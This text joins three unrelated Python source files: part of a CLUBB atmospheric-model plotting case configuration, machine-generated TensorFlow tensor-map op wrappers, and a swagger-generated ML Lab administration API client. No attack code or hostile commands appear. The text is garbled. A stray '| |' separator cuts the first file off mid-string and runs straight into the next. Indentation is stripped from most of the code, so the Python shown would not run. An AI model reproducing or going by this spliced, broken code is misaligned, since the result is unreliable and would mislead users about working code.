'height_min_value': 0, 'height_max_value': 1000,
'blacklisted_vars': [],
'sam_benchmark_file': None,
'clubb_file': {'zm': clubb_output_root + '/fire_zm.nc',
'zt': clubb_output_root + '/fire_zt.nc',
'sfc': clubb_output_root + '/fire_sfc.nc'},
'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/fire_coamps_sm.nc",
'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/fire_coamps_sw.nc"},
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/fire_zm.nc',
'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/fire_zt.nc',
'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/fire_sfc.nc'},
'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + "/fire_zm.nc",
'zt': HOC_OUTPUT_ROOT + '/fire_zt.nc',
'sfc': HOC_OUTPUT_ROOT + '/fire_sfc.nc'},
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': {'zm': wrf_output_root + "/fire_zm_wrf.nc",
'zt': wrf_output_root + "/fire_zt_wrf.nc",
'sfc': wrf_output_root + "/fire_sfc_wrf.nc"
},
'var_groups': [VariableGroupBase, VariableGroupWs]}
# No budgets
GABLS2 = {'name': 'gabls2',
'description': "",
'start_time': 2101, 'end_time': 2160,
'height_min_value': 0, 'height_max_value': 2500,
'blacklisted_vars': ['tau_zm', 'radht', 'Skw_zt', 'Skrt_zt', 'Skthl_zt', 'corr_w_chi_1', 'corr_chi_eta_1',
'rcp2', 'thlpthvp', 'rtpthvp'],
'sam_benchmark_file': None,
'clubb_file': {'zm': clubb_output_root + '/gabls2_zm.nc',
'zt': clubb_output_root + '/gabls2_zt.nc',
'sfc': clubb_output_root + '/gabls2_sfc.nc'},
'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/gabls2_coamps_sm.nc",
'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/gabls2_coamps_sw.nc",
'sfc': COAMPS_BENCHMARK_OUTPUT_ROOT + "/gabls2_coamps_sfc.nc"},
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase]}
GABLS2_NIGHTLY = {'name': 'gabls2_nightly',
'description': "",
'start_time': 2101, 'end_time': 2160,
'height_min_value': 0, 'height_max_value': 2500,
'blacklisted_vars': [],
'sam_benchmark_file': None,
'clubb_file': {'zm': clubb_output_root + '/gabls2_zm.nc',
'zt': clubb_output_root + '/gabls2_zt.nc',
'sfc': clubb_output_root + '/gabls2_sfc.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupScalars]}
GABLS3 = {'name': 'gabls3',
'description': "",
'start_time': 1081, 'end_time': 1200,
'height_min_value': 0, 'height_max_value': 4970,
'blacklisted_vars': [],
'sam_benchmark_file': None,
'clubb_file': {'zm': clubb_output_root + '/gabls3_zm.nc',
'zt': clubb_output_root + '/gabls3_zt.nc',
'sfc': clubb_output_root + '/gabls3_sfc.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase]}
GABLS3_NIGHT = {'name': 'gabls3_night',
'description': "Copied from plotgen: Uses a 5-min timestep with 48 levels",
'start_time': 421, 'end_time': 480,
'height_min_value': 0, 'height_max_value': 800,
'blacklisted_vars': [],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/SAM6.6/GABLS3_NIGHT/gabls3_night.nc"},
'clubb_file': {'zm': clubb_output_root + '/gabls3_night_zm.nc',
'zt': clubb_output_root + '/gabls3_night_zt.nc',
'sfc': clubb_output_root + '/gabls3_night_sfc.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase]}
GATE_SHEAR_RLSF = {'name': 'gate_shear_rlsf',
'description': "",
'start_time': 540, 'end_time': 720,
'height_min_value': 0, 'height_max_value': 24000,
'blacklisted_vars': [],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/SAM6.6/GATE_shear_rlsf/GATE_shear_rlsf_64x64x128_1km_5s.nc"},
'clubb_file': None,
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'sam_file': {'sam': sam_output_root + "/GATE_SAM_CLUBB.nc"},
'wrf_file': None,
'var_groups': [VariableGroupBase]}
# Use to plot IOP forced SAM runs
IOP = {'name': 'iop',
'description': "",
'start_time': 181, 'end_time': 1440,
'height_min_value': 0, 'height_max_value': 27750,
'blacklisted_vars': [],
'clubb_datasets': None,
'sam_benchmark_file': None,
'clubb_file': None,
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'var_groups': [VariableGroupBase, VariableGroupSamProfiles]}
JUN25_ALTOCU = {'name': 'jun25_altocu',
'description': "",
'start_time': 181, 'end_time': 240,
'height_min_value': 4825, 'height_max_value': 7290,
'blacklisted_vars': ['Ngm', 'wprrp', 'wpNrp'],
'sam_benchmark_file': None,
'clubb_file': {'zm': clubb_output_root + '/jun25_altocu_zm.nc',
'zt': clubb_output_root + '/jun25_altocu_zt.nc',
'sfc': clubb_output_root + '/jun25_altocu_sfc.nc'},
'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/jun25_altocu_qc3_coamps_sm.nc",
'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/jun25_altocu_qc3_coamps_sw.nc"},
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP]}
LBA = {'name': 'lba',
'description': "Note that sam-plotgen plots up to a height of 16000 not 12000.\n"
"Copied from plotgen: SAM-LES uses Morrison microphysics " +
"and CLUBB standalone uses COAMPS microphysics",
'start_time': 300, 'end_time': 360,
'height_min_value': 0, 'height_max_value': 14000,
'blacklisted_vars': ['wprrp', 'wpNrp', 'Ngm'],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/JULY_2017/LBA_128kmx128kmx128_1km_Morrison/LBA_128kmx128kmx128_1km_Morrison.nc"},
'clubb_file': {'zm': clubb_output_root + '/lba_zm.nc',
'zt': clubb_output_root + '/lba_zt.nc',
'sfc': clubb_output_root + '/lba_sfc.nc',
'subcolumns': clubb_output_root + '/lba_nl_lh_sample_points_2D.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'sam_file': {'sam': sam_output_root + "/LBA_SAM_CLUBB.nc"},
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP, VariableGroupWs]}
MC3E = {'name': 'mc3e',
'description': "",
'start_time': 60, 'end_time': 64800,
'height_min_value': 0, 'height_max_value': 18000,
'blacklisted_vars': ['rtp3', 'Skrt_zt', 'Skthl_zt', 'rtpthvp', 'thlpthvp', 'wprrp', 'wpNrp'],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/MC3E_r1359_128x128x128_1km_Morrison/MC3E.nc"},
'clubb_file': {'zm': clubb_output_root + '/mc3e_zm.nc',
'zt': clubb_output_root + '/mc3e_zt.nc',
'sfc': clubb_output_root + '/mc3e_sfc.nc',
'subcolumns': clubb_output_root + '/mc3e_nl_lh_sample_points_2D.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP]}
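# A minimal sanity-check sketch (not part of the original case list): every
# case above shares the same '*_file' key layout, so missing output files can
# be reported before plotting. The subset of cases named here is arbitrary.
if __name__ == '__main__':
    import os
    for _case in (DYCOMS2_RF01, DYCOMS2_RF02_DO, FIRE, GABLS2, LBA):
        for _key, _val in _case.items():
            if _key.endswith('_file') and isinstance(_val, dict):
                for _kind, _path in _val.items():
                    if not os.path.exists(_path):
                        print('%s: missing %s/%s -> %s'
                              % (_case['name'], _key, _kind, _path))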
MPACE_A = {'name': 'mpace_a',
'description': "Copied from plotgen: SAM-LES | |
"""Python wrappers around TensorFlow ops.
This file is MACHINE GENERATED! Do not edit.
Original C++ source file: map_ops.cc
"""
import collections
from tensorflow.python import pywrap_tfe as pywrap_tfe
from tensorflow.python.eager import context as _context
from tensorflow.python.eager import core as _core
from tensorflow.python.eager import execute as _execute
from tensorflow.python.framework import dtypes as _dtypes
from tensorflow.python.framework import op_def_registry as _op_def_registry
from tensorflow.python.framework import ops as _ops
from tensorflow.python.framework import op_def_library as _op_def_library
from tensorflow.python.util.deprecation import deprecated_endpoints
from tensorflow.python.util import dispatch as _dispatch
from tensorflow.python.util.tf_export import tf_export
from typing import TypeVar
@_dispatch.add_dispatch_list
@tf_export('empty_tensor_map')
def empty_tensor_map(name=None):
r"""Creates and returns an empty tensor map.
handle: an empty tensor map
Args:
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "EmptyTensorMap", name)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return empty_tensor_map_eager_fallback(
name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except (TypeError, ValueError):
result = _dispatch.dispatch(
empty_tensor_map, (), dict(name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
# Add nodes to the TensorFlow graph.
try:
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"EmptyTensorMap", name=name)
except (TypeError, ValueError):
result = _dispatch.dispatch(
empty_tensor_map, (), dict(name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ()
_inputs_flat = _op.inputs
_execute.record_gradient(
"EmptyTensorMap", _inputs_flat, _attrs, _result)
_result, = _result
return _result
EmptyTensorMap = tf_export("raw_ops.EmptyTensorMap")(_ops.to_raw_op(empty_tensor_map))
def empty_tensor_map_eager_fallback(name, ctx):
_inputs_flat = []
_attrs = None
_result = _execute.execute(b"EmptyTensorMap", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"EmptyTensorMap", _inputs_flat, _attrs, _result)
_result, = _result
return _result
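# Note on the pattern repeated by every wrapper in this file: in eager mode the
# op is first attempted through the TFE_Py_FastPathExecute C fast path, then
# through the *_eager_fallback helper; in graph mode a node is added via
# _apply_op_helper. TypeError/ValueError trigger the dispatch registry so that
# user-registered handlers get a chance to run before the error propagates.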
@_dispatch.add_dispatch_list
@tf_export('tensor_map_erase')
def tensor_map_erase(input_handle, key, value_dtype, name=None):
r"""Returns a tensor map with item from given key erased.
input_handle: the original map
output_handle: the map with value from given key removed
key: the key of the value to be erased
Args:
input_handle: A `Tensor` of type `variant`.
key: A `Tensor`.
value_dtype: A `tf.DType`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "TensorMapErase", name, input_handle, key, "value_dtype",
value_dtype)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return tensor_map_erase_eager_fallback(
input_handle, key, value_dtype=value_dtype, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except (TypeError, ValueError):
result = _dispatch.dispatch(
tensor_map_erase, (), dict(input_handle=input_handle, key=key,
value_dtype=value_dtype, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
# Add nodes to the TensorFlow graph.
value_dtype = _execute.make_type(value_dtype, "value_dtype")
try:
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"TensorMapErase", input_handle=input_handle, key=key,
value_dtype=value_dtype, name=name)
except (TypeError, ValueError):
result = _dispatch.dispatch(
tensor_map_erase, (), dict(input_handle=input_handle, key=key,
value_dtype=value_dtype, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("key_dtype", _op._get_attr_type("key_dtype"), "value_dtype",
_op._get_attr_type("value_dtype"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"TensorMapErase", _inputs_flat, _attrs, _result)
_result, = _result
return _result
TensorMapErase = tf_export("raw_ops.TensorMapErase")(_ops.to_raw_op(tensor_map_erase))
def tensor_map_erase_eager_fallback(input_handle, key, value_dtype, name, ctx):
value_dtype = _execute.make_type(value_dtype, "value_dtype")
_attr_key_dtype, (key,) = _execute.args_to_matching_eager([key], ctx, [])
input_handle = _ops.convert_to_tensor(input_handle, _dtypes.variant)
_inputs_flat = [input_handle, key]
_attrs = ("key_dtype", _attr_key_dtype, "value_dtype", value_dtype)
_result = _execute.execute(b"TensorMapErase", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"TensorMapErase", _inputs_flat, _attrs, _result)
_result, = _result
return _result
@_dispatch.add_dispatch_list
@tf_export('tensor_map_has_key')
def tensor_map_has_key(input_handle, key, name=None):
r"""Returns whether the given key exists in the map.
input_handle: the input map
key: the key to check
has_key: whether the key is already in the map or not
Args:
input_handle: A `Tensor` of type `variant`.
key: A `Tensor`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `bool`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "TensorMapHasKey", name, input_handle, key)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return tensor_map_has_key_eager_fallback(
input_handle, key, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except (TypeError, ValueError):
result = _dispatch.dispatch(
tensor_map_has_key, (), dict(input_handle=input_handle, key=key,
name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
# Add nodes to the TensorFlow graph.
try:
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"TensorMapHasKey", input_handle=input_handle, key=key, name=name)
except (TypeError, ValueError):
result = _dispatch.dispatch(
tensor_map_has_key, (), dict(input_handle=input_handle, key=key,
name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("key_dtype", _op._get_attr_type("key_dtype"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"TensorMapHasKey", _inputs_flat, _attrs, _result)
_result, = _result
return _result
TensorMapHasKey = tf_export("raw_ops.TensorMapHasKey")(_ops.to_raw_op(tensor_map_has_key))
def tensor_map_has_key_eager_fallback(input_handle, key, name, ctx):
_attr_key_dtype, (key,) = _execute.args_to_matching_eager([key], ctx, [])
input_handle = _ops.convert_to_tensor(input_handle, _dtypes.variant)
_inputs_flat = [input_handle, key]
_attrs = ("key_dtype", _attr_key_dtype)
_result = _execute.execute(b"TensorMapHasKey", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"TensorMapHasKey", _inputs_flat, _attrs, _result)
_result, = _result
return _result
@_dispatch.add_dispatch_list
@tf_export('tensor_map_insert')
def tensor_map_insert(input_handle, key, value, name=None):
r"""Returns a map that is the 'input_handle' with the given key-value pair inserted.
input_handle: the original map
output_handle: the map with key and value inserted
key: the key to be inserted
value: the value to be inserted
Args:
input_handle: A `Tensor` of type `variant`.
key: A `Tensor`.
value: A `Tensor`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "TensorMapInsert", name, input_handle, key, value)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return tensor_map_insert_eager_fallback(
input_handle, key, value, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except (TypeError, ValueError):
result = _dispatch.dispatch(
tensor_map_insert, (), dict(input_handle=input_handle, key=key,
value=value, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
# Add nodes to the TensorFlow graph.
try:
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"TensorMapInsert", input_handle=input_handle, key=key, value=value,
name=name)
except (TypeError, ValueError):
result = _dispatch.dispatch(
tensor_map_insert, (), dict(input_handle=input_handle, key=key,
value=value, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("key_dtype", _op._get_attr_type("key_dtype"), "value_dtype",
_op._get_attr_type("value_dtype"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"TensorMapInsert", _inputs_flat, _attrs, _result)
_result, = _result
return _result
TensorMapInsert = tf_export("raw_ops.TensorMapInsert")(_ops.to_raw_op(tensor_map_insert))
def tensor_map_insert_eager_fallback(input_handle, key, value, name, ctx):
_attr_key_dtype, (key,) = _execute.args_to_matching_eager([key], ctx, [])
_attr_value_dtype, (value,) = _execute.args_to_matching_eager([value], ctx, [])
input_handle = _ops.convert_to_tensor(input_handle, _dtypes.variant)
_inputs_flat = [input_handle, key, value]
_attrs = ("key_dtype", _attr_key_dtype, "value_dtype", _attr_value_dtype)
_result = _execute.execute(b"TensorMapInsert", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"TensorMapInsert", _inputs_flat, _attrs, _result)
_result, = _result
return _result
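# A minimal eager-mode sketch of how these ops compose (the raw_ops names are
# the ones exported in this file; key/value dtypes are inferred from the
# tensors passed in):
#
#   import tensorflow as tf
#   m = tf.raw_ops.EmptyTensorMap()
#   m = tf.raw_ops.TensorMapInsert(input_handle=m, key=tf.constant(1),
#                                  value=tf.constant([1.0, 2.0]))
#   tf.raw_ops.TensorMapHasKey(input_handle=m, key=tf.constant(1))   # True
#   tf.raw_ops.TensorMapLookup(input_handle=m, key=tf.constant(1),
#                              value_dtype=tf.float32)               # [1., 2.]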
@_dispatch.add_dispatch_list
@tf_export('tensor_map_lookup')
def tensor_map_lookup(input_handle, key, value_dtype, name=None):
r"""Returns the value from a given key in a tensor map.
input_handle: the input map
key: the key to be looked up
value: the value found from the given key
Args:
input_handle: A `Tensor` of type `variant`.
key: A `Tensor`.
value_dtype: A `tf.DType`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `value_dtype`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "TensorMapLookup", name, input_handle, key, "value_dtype",
value_dtype)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return tensor_map_lookup_eager_fallback(
input_handle, key, value_dtype=value_dtype, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except (TypeError, ValueError):
result = _dispatch.dispatch(
tensor_map_lookup, (), dict(input_handle=input_handle, key=key,
value_dtype=value_dtype, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
# Add nodes to the TensorFlow graph.
value_dtype = _execute.make_type(value_dtype, "value_dtype")
try:
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"TensorMapLookup", input_handle=input_handle, key=key,
value_dtype=value_dtype, name=name)
except (TypeError, ValueError):
result = _dispatch.dispatch(
tensor_map_lookup, (), dict(input_handle=input_handle, key=key,
value_dtype=value_dtype, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("key_dtype", _op._get_attr_type("key_dtype"), "value_dtype",
_op._get_attr_type("value_dtype"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"TensorMapLookup", _inputs_flat, _attrs, _result)
_result, = _result
return _result
TensorMapLookup = tf_export("raw_ops.TensorMapLookup")(_ops.to_raw_op(tensor_map_lookup))
def tensor_map_lookup_eager_fallback(input_handle, key, value_dtype, name, ctx):
value_dtype = _execute.make_type(value_dtype, "value_dtype")
_attr_key_dtype, (key,) = _execute.args_to_matching_eager([key], ctx, [])
input_handle = _ops.convert_to_tensor(input_handle, _dtypes.variant)
_inputs_flat = [input_handle, key]
_attrs = ("key_dtype", _attr_key_dtype, "value_dtype", value_dtype)
_result = _execute.execute(b"TensorMapLookup", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"TensorMapLookup", _inputs_flat, _attrs, _result)
_result, = _result
return _result
@_dispatch.add_dispatch_list
@tf_export('tensor_map_size')
def tensor_map_size(input_handle, name=None):
r"""Returns the number of tensors in the input tensor map.
input_handle: the input map
size: the number of tensors in the map
Args:
input_handle: A `Tensor` of type `variant`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `int32`.
"""
_ctx = _context._context | |
# coding: utf-8
"""
ML Lab Service
Functionality to create and manage Lab projects, services, datasets, models, and experiments. # noqa: E501
OpenAPI spec version: 3.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from lab_api.swagger_client.api_client import ApiClient
class AdministrationApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def check_workspace(self, **kwargs): # noqa: E501
"""Checks whether a workspace container for the passed id already exists. If not, a new one is created & started. # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.check_workspace(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id:
:param str authorization: Authorization Token
:return: StatusMessageFormat
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.check_workspace_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.check_workspace_with_http_info(**kwargs) # noqa: E501
return data
def check_workspace_with_http_info(self, **kwargs): # noqa: E501
"""Checks whether a workspace container for the passed id already exists. If not, a new one is created & started. # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.check_workspace_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id:
:param str authorization: Authorization Token
:return: StatusMessageFormat
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'authorization'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method check_workspace" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'id' in params:
query_params.append(('id', params['id'])) # noqa: E501
header_params = {}
if 'authorization' in params:
header_params['authorization'] = params['authorization'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/admin/workspace/check', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='StatusMessageFormat', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
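# A minimal usage sketch (hypothetical workspace id and token; host settings
# come from the generated ApiClient):
#
#   from lab_api.swagger_client.api_client import ApiClient
#   api = AdministrationApi(ApiClient())
#   status = api.check_workspace(id='my-workspace',
#                                authorization='Bearer <token>')
#   # non-blocking variant, as shown in the docstring above:
#   thread = api.check_workspace(id='my-workspace', async_req=True)
#   status = thread.get()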
def get_events(self, **kwargs): # noqa: E501
"""Returns events filtered by a specified event type (admin-only). # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_events(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str event: Event Type. If not provided, all events will be returned.
:param str authorization: Authorization Token
:return: ListOfLabEventsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_events_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_events_with_http_info(**kwargs) # noqa: E501
return data
def get_events_with_http_info(self, **kwargs): # noqa: E501
"""Returns events filtered by a specified event type (admin-only). # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_events_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str event: Event Type. If not provided, all events will be returned.
:param str authorization: Authorization Token
:return: ListOfLabEventsResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['event', 'authorization'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_events" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'event' in params:
query_params.append(('event', params['event'])) # noqa: E501
header_params = {}
if 'authorization' in params:
header_params['authorization'] = params['authorization'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/admin/events', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ListOfLabEventsResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_lab_info(self, **kwargs): # noqa: E501
"""Returns information about this Lab instance. # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_lab_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str authorization: Authorization Token
:return: LabInfoResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_lab_info_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_lab_info_with_http_info(**kwargs) # noqa: E501
return data
def get_lab_info_with_http_info(self, **kwargs): # noqa: E501
"""Returns information about this Lab instance. # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_lab_info_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str authorization: Authorization Token
:return: LabInfoResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['authorization'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_lab_info" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'authorization' in params:
header_params['authorization'] = params['authorization'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/admin/info', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
